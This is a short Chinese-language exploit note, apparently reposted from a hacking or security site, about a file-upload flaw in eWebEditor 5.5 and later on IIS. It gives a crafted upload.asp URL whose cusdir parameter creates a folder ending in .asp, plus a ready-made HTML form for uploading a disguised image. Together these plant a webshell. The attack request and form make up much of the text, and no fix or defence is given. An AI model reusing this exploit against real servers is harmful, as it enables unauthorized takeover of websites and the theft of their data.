影响版本:ewebeditor5.5版,对6.X以上版本也管用,对ASP。aspx。JSP。均管用。
转载地址:http://www.chouwazi.com/article.asp?id=301
ewebeditor5.5版没有mdb数据库,账号和密码存在配置文件
漏洞描述:利用IIS的解析漏洞建立一个XX.asp的文件夹,上传jpg拿webshell
1. http://www.xxx.net/ewebeditor/asp/upload.asp?action=save&type=p_w_picpath&style=popup&cusdir=dd.asp
可以建立一个a.asp文件夹
或者直接用html上传
<form action="http://www.XXX.com/ewebeditor/asp/upload.asp?action=save&type=p_w_picpath&style=popup&cusdir=dd.asp" method=
post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>